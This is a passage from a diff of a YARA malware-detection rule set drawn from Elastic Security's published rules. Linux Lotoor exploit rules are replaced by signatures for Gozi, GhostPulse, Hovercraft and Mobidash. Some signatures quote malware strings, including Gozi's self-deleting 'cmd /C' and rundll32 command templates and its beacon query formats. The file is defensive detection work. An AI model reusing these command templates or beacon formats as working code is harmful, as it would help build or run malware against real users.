"/com.apple.safari.ck" ascii fullword + $str_5 = "/chkupdate.XXX" ascii fullword + $seq_file_dir = { 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 48 63 45 ?? 48 83 C0 ?? 48 8B 4D ?? 0F B7 49 ?? 48 01 C8 48 83 C0 01 48 3D 00 00 0A 00 0F 86 ?? ?? ?? ?? } + $seq_cmd_send = { 8B 45 ?? 83 F8 ?? 0F 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 78 ?? 48 8B 70 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? } + $seq_cfg_get = { 8B 45 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 48 8B 45 ?? 48 8B 38 48 8B 70 ?? 8B 55 ?? E8 ?? ?? ?? ?? 89 45 ?? E9 ?? ?? ?? ?? } + $seq_proc_list = { 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 48 8B 85 ?? ?? ?? ?? 89 48 ?? 8B 4D ?? 48 8B 85 ?? ?? ?? ?? 89 48 ?? 8B 4D ?? 48 8B 85 ?? ?? ?? ?? } + $rc4_key = { D9 F9 36 CE 62 8C 3E 5D 9B 36 95 69 4D 1C DE 79 E4 70 E9 38 06 4D 98 FB F4 EF 98 0A 55 58 D1 C9 0C 7E 65 0C 23 62 A2 1B 91 4A BD 17 3A BA 5C 0E 58 37 C4 7B 89 F7 4C 5B 23 A7 29 4C C1 CF D1 1B } condition: - all of them + 4 of ($str*) or 3 of ($seq*) or $rc4_key } -rule ELASTIC_Linux_Exploit_Lotoor_757637D9 : FILE MEMORY +rule ELASTIC_Windows_Attacksimulation_Hovercraft_F5C7178F : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Attacksimulation Hovercraft (Windows.AttackSimulation.Hovercraft)" author = "Elastic Security" - id = "757637d9-6171-4e2a-bf7c-3ee2c71066a7" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0762fa4e0d74e3c21b2afc8e4c28e2292d1c3de3683c46b5b77f0f9fe1faeec7" - logic_hash = "b1f1784aae5958740d03ca50d0b9731e8db7d86d918d16e82cf6fc1e1bf663a9" + id = "f5c7178f-9a3f-463d-96a7-0a82cbed9ba2" + date = "2022-05-23" + modified = "2022-07-18" + reference = "046645b2a646c83b4434a893a0876ea9bd51ae05e70d4e72f2ccc648b0f18cb6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_AttackSimulation_Hovercraft.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e707e89904a5fa4d30f94bfc625b736a411df6bb055c0e40df18ae65025a3740" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7fa3e2432ddd696b5d40aafbde1e026e74294d31c9201800ce66b343a3724c6e" - severity = 100 + fingerprint = "8965ab173fd09582c9e77e7c54c9722b91b71ecbe42c4f8a8cc87d9a780ffe8c" + severity = 1 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 64 00 73 70 72 69 6E 74 66 00 6F 70 65 6E 00 69 73 5F 6F 6C } + $a1 = "MyHovercraftIsFullOfEels" wide fullword + $a2 = "WinHttp.dll" fullword condition: all of them } -rule ELASTIC_Linux_Exploit_Lotoor_78543893 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Gozi_Fd494041 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Trojan Gozi (Windows.Trojan.Gozi)" author = "Elastic Security" - id = "78543893-7180-4857-8951-4190ca4602f1" - date = "2021-01-12" - modified = "2021-09-16" + id = "fd494041-3fe8-4ffa-9ab8-6798032f1d66" + date = "2021-03-22" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ff5b02d2b4dfa9c3d53e7218533f3c57e82315be8f62aa17e26eda55a3b53479" - logic_hash = "4bb6a6e063fd00569b04f4514ec1731357aa8e8ce4cfee354fdd86773a4358da" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Gozi.yar#L1-L32" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237" + logic_hash = "fdd18817e7377f1b4006d3bf135d924b8ead62a461ea56f57157b2856ba6846b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b581e0820d7895021841d67e4e9dc40cec8f5ae5ba4dbc0585abcb76f97c9a2f" + fingerprint = "faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 48 8B 48 08 48 8B 54 24 F0 48 63 C6 48 89 8C C2 88 00 00 00 83 44 24 } + $a1 = "/C ping localhost -n %u && del \"%s\"" wide fullword + $a2 = "/C \"copy \"%s\" \"%s\" /y && \"%s\" \"%s\"" wide fullword + $a3 = "/C \"copy \"%s\" \"%s\" /y && rundll32 \"%s\",%S\"" wide fullword + $a4 = "ASCII.GetString(( gp \"%S:\\%S\").%s))',0,0)" wide + $a5 = "filename=\"%.4u.%lu\"" + $a6 = "Urundll32 \"%s\",%S" wide fullword + $a7 = "version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s" ascii fullword + $a8 = "%08X-%04X-%04X-%04X-%08X%04X" ascii fullword + $a9 = "&whoami=%s" ascii fullword + $a10 = "%u.%u_%u_%u_x%u" ascii fullword + $a11 = "size=%u&hash=0x%08x" ascii fullword + $a12 = "&uptime=%u" ascii fullword + $a13 = "%systemroot%\\system32\\c_1252.nls" ascii fullword + $a14 = "IE10RunOnceLastShown_TIMESTAMP" ascii fullword condition: - all of them + 8 of ($a*) } -rule ELASTIC_Linux_Exploit_Lotoor_4F8D83D2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Gozi_261F5Ac5 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Trojan Gozi (Windows.Trojan.Gozi)" author = "Elastic Security" - id = "4f8d83d2-4f7b-4a55-9d08-f7bc84263302" - date = "2021-01-12" - modified = "2021-09-16" + id = "261f5ac5-7800-4580-ac37-80b71c47c270" + date = "2019-08-02" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d78128eca706557eeab8a454cf875362a097459347ddc32118f71bd6c73d5bbd" - logic_hash = "6fee488d97fe1d4be558b6886c603010c6d1423a750783b38a65d2fb3eeb76f4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Gozi.yar#L34-L60" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f" + logic_hash = "23a7427e162e2f77ee0a281fe4bc54eab29a3bdca8e51015147e8eb223e7e2f7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1a4e2746eb1da2a841c08ea44c6d0476c02dae5b4fbbe17926433bdb8c4e6df5" + fingerprint = "cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 75 6E 61 6D 65 00 73 74 64 6F 75 74 00 66 77 72 69 74 65 00 } + $a1 = "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" + $a2 = "version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s" + $a3 = "Content-Disposition: form-data; name=\"upload_file\"; filename=\"%.4u.%lu\"" + $a4 = "&tor=1" + $a5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)" + $a6 = "http://constitution.org/usdeclar.txt" + $a7 = "grabs=" + $a8 = "CHROME.DLL" + $a9 = "Software\\AppDataLow\\Software\\Microsoft\\" condition: - all of them + 4 of ($a*) } -rule ELASTIC_Linux_Exploit_Lotoor_F4Afd230 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Ghostpulse_A1311F49 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" author = "Elastic Security" - id = "f4afd230-6c9f-49e8-8f13-429635b38eb5" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "805e900ffc9edb9f550dcbc938a3b06d28e9e7d3fb604ff68a311a0accbcd2b1" - logic_hash = "9aba4ebbf946f07071bfb94fa50c6981ae8c659aca9ee6e05c7ef214432d7466" + id = "a1311f49-65a7-4136-a5ab-28cf4de4d40f" + date = "2023-10-06" + modified = "2023-10-26" + reference = "https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_GhostPulse.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0175448655e593aa299278d5f11b81f2af76638859e104975bdb5d30af5c0c11" + logic_hash = "21838f230ac1a77f09d01d30f4ea3b66313618660e63ab7012b030e0b819547e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1709244fdc1e2d9d7fba01743b0cf87de7b940d2b25a0016e021b7e9696525bc" + fingerprint = "e07a8152ab75624aa8dd0a8301d690a6a4bdd3b0e069699632541fb6a32e419b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 83 20 FF FF FF 85 C0 74 25 8B 83 F8 FF FF FF 85 C0 74 1B 83 } + $a1 = { 0F BE 00 48 0F BE C0 85 C0 74 0D B8 01 00 00 00 03 45 00 89 45 00 EB E1 8B 45 00 48 8D 65 10 5D C3 } + $a2 = { 88 4C 24 08 48 83 EC 18 0F B6 44 24 20 88 04 24 0F BE 44 24 20 83 F8 41 7C 13 0F BE 04 24 83 F8 5A 7F 0A 0F BE 04 24 83 C0 20 88 04 24 } condition: - all of them + any of them } -rule ELASTIC_Linux_Exploit_Lotoor_Bb384Bc9 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Ghostpulse_3Fe1D02D : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" author = "Elastic Security" - id = "bb384bc9-fcda-4ad4-82ad-b95de750d31c" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ecc6635117b99419255af5d292a7af3887b06d5f3b0f59d158281eebfe606445" - logic_hash = "1e9faba4f245d8b0d6944430286a5fc3e11cd7e036a4151b29fc2c5f037894fb" + id = "3fe1d02d-5de3-42df-8389-6a55fc2b8afd" + date = "2023-10-12" + modified = "2023-10-26" + reference = "https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_GhostPulse.yar#L23-L41" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "4ef78d436a153ed751a8483c1e43ec2ba053dedfa0da2780fded42012d3042c1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6878670c1fa154f5c4a845a824c63d0a900359b6e122b3fa759077c6a7e33e4c" + fingerprint = "18aed348ba64bee842fb6af3b3220e108052a67f49724cf34ba52c8ec7c15cac" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C2 75 64 4C 8B 45 F0 49 83 C0 04 4C 8B 4D F0 49 83 C1 08 48 8B } + $a = { 48 89 5C 24 08 48 89 7C 24 10 8B DA 45 33 D2 48 8B F9 41 2B D9 74 50 4C 8B D9 4C 2B C1 0F 1F 00 33 C9 } condition: all of them } -rule ELASTIC_Linux_Exploit_Lotoor_B293F6Ec : FILE MEMORY +rule ELASTIC_Windows_Trojan_Ghostpulse_3673D337 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" author = "Elastic Security" - id = "b293f6ec-0342-4727-b2a1-bd60be11ef74" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d1fa8520d3c3811d29c3d5702e7e0e7296b3faef0553835c495223a2bc015214" - logic_hash = "0e310082714f5283f9b4ccde5a8e17994e3bc4acf3d744b22734c136dde7cebb" + id = "3673d337-218b-4ea8-93f5-ecbc6fe51885" + date = "2023-12-11" + modified = "2024-01-12" + reference = "https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_GhostPulse.yar#L43-L63" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3013ba32838f6d97d7d75e25394f9611b1c5def94d93588f0a05c90b25b7d6d5" + logic_hash = "a92815f27533338e17afd5ebdbe82e382636fb81167a82d1b613c0dccc5b7ed3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "42c95bdd82e398bceeb985cff50f4613596b71024c052487f5b337bb35489594" + fingerprint = "0b46a0e04ab2ca2760b2ace397a09b681bc6c0da5581c3f0f5cdb1a60f307a15" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { B8 89 45 A8 8B 45 A8 83 C0 64 89 45 B4 EB 2A 8B 45 A8 48 98 48 C1 } + $IDAT_parser_x86 = { 80 F9 3F 75 ?? 38 54 1E 02 74 ?? 80 FA 3F 75 ?? 38 6C 1E 03 74 ?? 80 FD 3F 75 ?? 8A 74 24 04 38 74 1E 04 } + $IDAT_parser_x64 = { 80 FB 3F 0F 94 44 24 27 3C 3F 0F 94 44 24 30 40 80 FF 3F 0F 94 44 24 31 41 80 FD 3F 0F 94 44 24 32 41 80 FC 3F 0F 94 44 24 33 } condition: - all of them + any of them } -rule ELASTIC_Linux_Exploit_Lotoor_C5983669 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Ghostpulse_8Ae8310B : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" author = "Elastic Security" - id = "c5983669-67d6-4a9e-945f-aae383211872" - date = "2021-01-12" - modified = "2021-09-16" + id = "8ae8310b-4ead-4b5c-be73-7db365470891" + date = "2024-05-27" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d08be92a484991afae3567256b6cec60a53400e0e9b6f6b4d5c416a22ccca1cf" - logic_hash = "ff673070969f1ededf8ff2c7cadfc251c7d2e52da58906b15cfc04593a755d55" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_GhostPulse.yar#L65-L84" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b64f91b41a7390d89cd3b1fccf02b08b18b7fed17a43b0bfac63d75dc0df083" + logic_hash = "b3873a3c728e98d65984033620c0ac8ee93be21db5b6d9bd4665b9f7d0d759fa" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1d74ddacc623a433f84b1ab6e74bcfc0e69afb29f40a8b2d660d96a88610c3b2" + fingerprint = "61213fd4ce9ddebdc7de8e6b23827347af3cbddd61254f95917e9af6b8a2b7b2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 48 83 C0 58 48 89 44 24 20 48 8B 44 24 18 48 89 C7 BA 60 00 } + $a = { 48 8B 84 24 ?? 0D 00 00 8B 40 14 0F BA E8 09 48 8B 8C 24 ?? 0D 00 00 89 41 14 48 8B 84 24 ?? 0D 00 00 48 8B 8C 24 ?? 05 00 00 48 89 88 C0 ?? 00 00 } + $b = { BA C8 90 F0 B2 48 8B ?? ?? ?? E8 ?? ?? ?? 00 48 89 ?? ?? ?? 07 00 00 BA 9C 6C DA DC 48 8B ?? ?? ?? E8 ?? ?? ?? 00 48 89 ?? ?? ?? 07 00 00 BA 8D 20 4A A1 48 8B ?? ?? ?? E8 ?? ?? ?? 00 48 89 ?? ?? ?? 07 00 00 BA D4 7C 1A A8 } condition: - all of them + any of them } -rule ELASTIC_Linux_Exploit_Lotoor_Fbff22Da : FILE MEMORY +rule ELASTIC_Windows_Trojan_Ghostpulse_9E22C56D : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" author = "Elastic Security" - id = "fbff22da-2f31-416c-8aa0-1003e3be8baa" - date = "2021-01-12" - modified = "2021-09-16" + id = "9e22c56d-91bf-4259-8b60-aa7323b5e8f9" + date = "2024-07-21" + modified = "2024-07-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L161-L179" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0762fa4e0d74e3c21b2afc8e4c28e2292d1c3de3683c46b5b77f0f9fe1faeec7" - logic_hash = "d3e3037593f5714dfb49c6e19631fd46331e2702c8bf6d6099bb5b34158321a9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_GhostPulse.yar#L86-L106" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "349b4dfa1e93144b010affba926663264288a5cfcb7b305320f466b2551b93df" + logic_hash = "5dbd0d6a936a73e933181017c67c36fde7576b47643ec00848f7b58170bd9c6b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b649b172fad3e3b085cbf250bd17dbea4c409a7337914c63230d188f9b8135fa" + fingerprint = "5e9883ad58fee79960a6e5e3c266885c6dc72057a16f4ea0e371088571e9b663" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 75 6E 61 6D 65 00 73 74 72 6C 65 6E 00 73 74 64 6F 75 74 00 } + $a = { C7 44 24 28 80 3C 36 FE C7 44 24 2C FF FF FF FF 53 6A 00 } + $b = { 80 7C 24 04 3F ?? ?? 8A 74 24 08 38 74 1E 05 8A 6C 24 10 ?? ?? 80 7C 24 08 3F } + $c = { 89 41 5C 8B 44 24 ?? 8B 80 04 01 00 00 89 44 24 ?? 8B 42 3C 8B 44 02 78 8B 4C 02 20 01 D1 89 4C 24 ?? 8B 4C 02 1C 89 4C 24 ?? 8B 44 02 24 89 44 } condition: - all of them + any of them } -rule ELASTIC_Linux_Exploit_Lotoor_E2D5Fad8 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_52A15A93 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "e2d5fad8-45b6-4d65-826d-b909230e2b69" + id = "52a15a93-0574-44bb-83c9-793558432553" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L181-L199" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7e54e57db3de32555c15e529c04b35f52d75af630e45b5f8d6c21149866b6929" - logic_hash = "b294ce1c4d928d73342bb6260456d850f9c59f3c48c7c4ffbce32ea9238f6eee" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6694640e7df5308a969ef40f86393a65febe51639069cb7eaa5650f62c1f4083" + logic_hash = "ceaf5b06108baa6043e31010d777099ed6ac9b4054e86d41309bd7c2b0ffda11" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ec64f2c3ca5ec2bfc2146159dab3258e389be5962bdddf4c6db5975cc730a231" + fingerprint = "a7ceff3bbd61929ab000d18ffdf2e8d1753ecea123e26cd626e3af64341effe6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74155,28 +74602,28 @@ rule ELASTIC_Linux_Exploit_Lotoor_E2D5Fad8 : FILE MEMORY os = "linux" strings: - $a = { 8B 45 E4 8B 00 89 45 E8 8B 45 E8 8B 00 85 C0 75 08 8B 45 E8 89 } + $a = { 41 89 CE 41 55 41 54 49 89 F4 55 48 89 D5 53 48 89 FB 48 8B 07 FF 90 F8 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_Lotoor_F2F8Eb6B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_D0Ad9C82 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "f2f8eb6b-1fc3-4fca-b58d-d71ad932e1a7" + id = "d0ad9c82-718f-43d1-a764-9be83893f9b8" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L201-L219" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "01721b9c024ca943f42c402a57f45bd4c77203a604c5c2cd26e5670df76a95b2" - logic_hash = "b6555e69b663591550976fd44352ecbdf0a0aef1e07a64396a576125a4fe4ba6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6694640e7df5308a969ef40f86393a65febe51639069cb7eaa5650f62c1f4083" + logic_hash = "8351cb61f5b712c65962e734a7c29271fa4805720e14b6badc9bc1c0364778f8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "881e2cd5b644c2511306b3670320224810de369971278516f7562076226fa5b7" + fingerprint = "ef6b2f9383c137eb4adfe0a6322a0e5d71cb4a5712f1be26fe687144933cbbc8" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74184,28 +74631,28 @@ rule ELASTIC_Linux_Exploit_Lotoor_F2F8Eb6B : FILE MEMORY os = "linux" strings: - $a = { 24 14 40 00 00 00 EB 38 8B 44 24 14 48 98 83 E0 3F 48 85 C0 } + $a = { 41 54 49 89 CC 55 48 89 D5 53 48 89 FB 48 8D 64 24 F8 48 8B 07 FF 90 F8 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_Lotoor_89671B03 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_E2C89606 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "89671b03-5bd4-481b-9304-2655ea689c5f" - date = "2021-04-06" + id = "e2c89606-511c-403a-a4eb-d18dc7aca444" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L241-L259" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "001098473574cfac1edaca9f1180ab2005569e094be63186c45b48c18f880cf8" - logic_hash = "dfa7027c4fa0cbde33df87063fea4ecf51a085f3cc1805123c62747882d0a07e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6694640e7df5308a969ef40f86393a65febe51639069cb7eaa5650f62c1f4083" + logic_hash = "64cb8d8ec04a53f663b216208279afba3c10f148fe99822f9a45100a4f73ed28" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e8b9631e5d4d8db559615504cc3f6fbd8a81bfbdb9e570113f20d006c44c8a9c" + fingerprint = "91c51f6af18389f2efb0032e0b775df68f34b66795c05623dccb67266c04214b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74213,28 +74660,27 @@ rule ELASTIC_Linux_Exploit_Lotoor_89671B03 : FILE MEMORY os = "linux" strings: - $a = { 62 65 6C 3A 20 4C 69 6E 75 78 20 3C 20 32 2E 36 } + $a = { 13 49 89 C7 4C 89 E6 48 89 DF FF 92 B8 00 00 00 31 C9 4C 89 FA 4C } condition: all of them } -rule ELASTIC_Linux_Exploit_Lotoor_Dbc73Db0 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_82B4E3F3 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "dbc73db0-527c-436f-afdc-bc3750f10ea0" - date = "2021-04-06" + id = "82b4e3f3-a9ba-477c-8eef-6010767be52f" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = 